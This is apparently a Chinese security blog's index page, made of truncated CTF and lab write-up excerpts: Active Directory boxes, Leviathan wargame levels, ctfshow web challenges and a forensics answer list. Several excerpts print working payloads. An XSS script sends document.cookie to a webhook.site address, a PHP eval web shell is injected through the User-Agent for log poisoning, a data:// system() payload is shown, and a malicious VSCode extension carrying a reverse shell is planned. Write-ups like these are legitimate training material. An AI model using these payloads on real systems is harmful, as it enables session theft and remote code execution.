小chen妙妙屋

难度：基础 端口扫描1nmap -Pn -p $port 10.129.35.15 端口信息收集1234set port 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49678,49690,49703,50902nmap -Pn -sC -A -p $port 10.129.35.158 注意到有smb，试试匿名访问 smb匿名访问1smbmap -H 10.129.35.158 -u '111' -p '' 1smbclient.py 111@10.129.35.158 密码随便填，登入smb服务器，拿到userinfo的net程序逆向可得 此时需要写python来获取密钥123456789101112import base64enc_passowrd = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"key = b"armando"array = base64.b ...

将域名信息写入hosts 枚举使用smbmap进行枚举1smbmap -H 10.129.34.224 -u "alex.turner" -p "Checkpoint2024!" 枚举用户名1nxc smb 10.129.34.224 -u "alex.turner" -p "Checkpoint2024!" --users 使用bloodyad收集acl提权方法注意到这里有一个可写可疑的已删除用户：Mark Davies 这里好像是有个点没显示出来，反正是成功恢复Mark.Davies 再次使用通用的密码，发现可以登录，同时注意到DevDrop可写，可以尝试vscode恶意插件 在网络上查找vscode插件编写的方法得知需要下面三个文件：package.json：用于表明vscode执行参数 exp.js：放入攻击shell，使用javascript编写 vsixmanifest：用于说明插件身份信息，方便打成vimx 反复测试ing…反正最后是成功了 1$client = New-Object Sys ...

第0关第0关挺简单的，就是正常访问隐藏路径就行 第1关第1关通过IDA逆向可得密码是：sex 输入可得 第2关 这里需要用到命令注入，由于程序没有过滤你的输入，直接把输入拼接到 system() 函数中执行了 创建一个免费的目录，用软链接进行 此时命令变成了"touch /etc/leviathan_pass/leviathan3 b" 很明显跨权限读取到了文件 第3关这里感觉可能是想初步感受一下栈 其实就是很简单的一个函数的跳转 第4关 直接解密可得 第5关和前面差不多，创造软链接来迷惑程序 第6关不用多说，一个比较就行了

第21-第22关第21关 首先他给了我们一个字典，然后我们就可以根据他给的字典爆破 他的认证方式是这样的 首先我们抓包，抓的是用户名和密码那个界面的包 所以我们可以发现在这里我们发现多了一行奇怪的东西发现他是以admin:XXX的格式去显示的，我们后续准备爆破的时候需要记住这个格式。准备开始爆破，在这里先对bp的intruder模块进行介绍Payload position (载荷位置) ：选择你需要爆破的位置这里给了你几个选项，Add Clear Auto 分别是增加，清除和自动bp选中方式是把你光标选中后的字符串包裹比如你的光标在这里，我们添加以后就会遇到这种情况他是成对的添加，所以我们需要爆破那一个字符串的话，我们就需要用光标选中那一串字符串就像这样我们在添加的时候就会把这串字符串包裹上 Payload type (载荷类型)：决定了数据的生成方式。图中当前选择的是 Simple list (简单列表)，即手动或导入一列字符串。Burp 还支持很多其他类型，比如 Numbers（数字递增）、Dates（日期生成）、Bruteforcer（字符组合爆破）等 1234567891011 ...

检材：百度网盘链接：https://pan.baidu.com/s/1UV8K7PiakhvYNrTool__YA提取码:ha86校验值sha256：830d0227bd16768648245e1aefe5d6583dd1d077b43b86422066b198ea169efavc密码：FIC-{e404d6e66586e9460c23755afab5a872bcf78ab4} 题目一共53题 pc10题,手机17，服务器17，互联网3，二进制5 计算机部分1.分析计算机检材，操作系统版本号为【参考格式：1.1】 23.1 2.分析计算机检材，李安弘曾收到一份免费领取token的邮件的疑似钓鱼邮件，其发送用户邮箱为【参考格式：123\@qq.com】 hf13338261292\@outlook.com 3.分析计算机检材，李安弘电脑中记录的黄金换现金的商家联系方式为【参考格式：110】13612817854 4.分析计算机检材，推广设计图中的apk下载链接为【参考格式：http:///?\*】https://drive.google.com/file/d/1z3aRS-lkaJYK ...

难度：中等 NMAP扫描123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101┌──(root㉿kali)-[/home/kali]└─# nmap -Pn -p- -T4 -A 10.129.56.228 Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-12 05:03 -0400Nmap scan report for 10.129.56.228Host is up (0.41s latency).Not shown: 65505 closed tcp ports (reset)PORT STATE SERVICE VERSION53/tcp open domain ...

本篇wp由小睿孩所写，已获得xrh同意上传！同时也感谢xrh的编写 第1关-第5关第1关 靶场进去是这样的，然后查看网页源代码 ctfshow{5c545075-c0dd-4338-8bd8-6f6cadedd007} 第2关 第一种解法:进去以后发现查看不了网页源代码 但是可以按crtl+u 查看 js前台拦截 === 无效操作 第二种解法： ctrl + shift + i 打开开发者工具 第三种解法： 手动输入view-source协议：即可查看 第3关首先进去界面 先抓包，开启拦截 将 Intercept 的选项变成on就可以了，如果是页面已经进去的情况下，那么重新刷新即可 然后右击 点击 send to repeater 得到返回的数据 成功得到flag，同样的在Inspector里可以看到返回包的细节，也可以看到flag 第4关题目让我们查看robots,那么我们直接在url后面输入robot.txt 然后可以看到他给了一个路径 flagishere.txt,然后我们接着找 ctfshow{b95d7838-10a3-414b-814b-c0bc5a25231f ...

第316关-第321关第316关直接使用webhook输入1234<script> var img = new Image(); img.src = "https://webhook.site/你的专属ID?cookie=" + btoa(document.cookie);</script> 然后正常等就行，一般会刷新几轮刷出来 第317关对script的绕过，换一个测试语句就好<svg onload="new Image().src='https://webhook.site/你的专属ID?cookie=' + btoa(document.cookie)"> 第318关和前面一样的没啥好说

第373关-378关第373关1234567891011121314151617181920212223<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date:   2021-01-07 12:59:52# @Last Modified by:   h1xa# @Last Modified time: 2021-01-07 13:36:47# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);libxml_disable_entity_loader(false);$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){    $dom = new DOMDocument();    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);    $creds = simplexml_i ...

第78题-第83题第78题直接file=php://filter/read=convert.base64-encode/resource=flag.php，然后命令行解密 或者使用data伪协议 第79题可以使用短标签绕过file=data://text/plain,<?=system('tac flag.php');?> 或者base64编码一下也可以 第80题日志投毒，没啥好说的ua改成Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0<?php @eval($_POST['cmd']); ?> payload改成?file=/var/log/nginx/access.log&2=phpinfo(); 结束 最后我结合蚁剑 第81题 依旧日志包含 第82题